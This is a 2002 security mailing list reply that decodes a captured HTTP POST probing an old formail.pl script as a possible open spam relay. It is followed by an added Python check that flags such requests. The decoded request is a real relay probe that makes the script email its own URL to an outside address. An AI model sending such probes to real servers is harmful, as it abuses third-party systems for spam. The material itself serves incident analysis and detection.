Security Incidents mailing list archives

Re: new type of formmail probes
From: "Kerry Thompson" <kerry () crypt gen nz>
Date: Fri, 6 Sep 2002 09:12:59 +1200 (NZST)

Hi Russell

I don't see any fancy unicode or DOS commands in here, so I would say it
is a relatively harmless probe for open formmail relays, probably for spam
use. There are a number of automated tools that look for old formail.pl
programs to exploit as relays. The POST translated to plain text follows
(the backslash breaks are mine for readability):

---------------------------------------------------------------
POST /cgi-bin/formail.pl HTTP/1.0
Via: 1.0 SERVER
Connection: Keep-Alive
Content-Length: 402
User-Agent: Mozilla/4.06 (Win95; I)
Content-Type: application/x-www-form-urlencoded
Host: www.cs.auckland.ac.nz
Accept: image/gif, image/x-xpixmap, image/jpeg, application/msword, */*
Referer: www.cs.auckland.ac.nz

email=daa18 () fdj10 com&recipient=<iikestyx () aol com>www.cs.auckland.ac.nz\
&subject=www.cs.auckland.ac.nz/cgi-bin/formail.pl              oxy52\
&=

time/date: 08:20:19pm / 09/04/2002
<A HREF="www.cs.auckland.ac.nz/cgi-bin/formail.pl">\
www.cs.auckland.ac.nz/cgi-bin/formail.pl</A>





oxy52
---------------------------------------------------------------

It seems to be probing formail and getting it to send an Email back to the
spammer containing a URL for the vulnerable formail.

I've checked Google for "oxy52" but found nothing, it's probably just a
tag for whoever is receiving the mail.

Kerry


Russell Fulton said:
Hi All,
      Over the last week or so snort has been picking up many probes like
this:

[snip]



-- 
Kerry Thompson, CISSP
Information Systems Security Consultant
http://www.crypt.gen.nz  kerry () crypt gen nz
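
Added example, not part of the original post: a Python check that flags a POST shaped like the one decoded above, where a form-mail script is asked to mail an off-site recipient and the submitted fields carry the script's own URL. The sample request, the `.example` names, the script-name pattern and the `local_domains` parameter are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# formail.pl is the path seen in the post; the other names are assumed variants.
SCRIPT_RE = re.compile(r"/(?:formail|formmail)\.(?:pl|cgi)$", re.I)
ADDR_RE = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def inspect_formmail_post(raw, local_domains):
    """Return findings for a POST to a form-mail script, or None if not one."""
    method, path, headers, body = parse_request(raw)
    script = path.split("?", 1)[0]
    if method != "POST" or not SCRIPT_RE.search(script):
        return None
    form = parse_qs(body.strip(), keep_blank_values=True)
    # Pull the address out of the recipient value instead of suffix-matching the
    # whole string: in the probe the site's own hostname trails the address.
    external = []
    for value in form.get("recipient", []):
        for m in ADDR_RE.finditer(value):
            dom = m.group(1).lower()
            if not any(dom == d or dom.endswith("." + d) for d in local_domains):
                external.append(m.group(0))
    # Fields that echo this host's script URL would tell the receiver where it lives.
    host = headers.get("host", "").lower()
    self_url = host + script.lower()
    echoed = sorted(k for k, vals in form.items() if host and k != "recipient"
                    and any(self_url in v.lower() for v in vals))
    return {"external_recipients": external, "self_url_fields": echoed,
            "relay_probe": bool(external and echoed)}

# Constructed sample modelled on the decoded request above (not the original data).
SAMPLE = ("POST /cgi-bin/formail.pl HTTP/1.0\nHost: www.site.example\n"
          "Content-Type: application/x-www-form-urlencoded\n\n"
          "email=a%40sender.example"
          "&recipient=%3Cdrop%40collector.example%3Ewww.site.example"
          "&subject=www.site.example%2Fcgi-bin%2Fformail.pl+tag01"
          "&=%3CA+HREF%3D%22www.site.example%2Fcgi-bin%2Fformail.pl%22%3E")

if __name__ == "__main__":
    print(inspect_formmail_post(SAMPLE, ("site.example",)))
```
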





----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

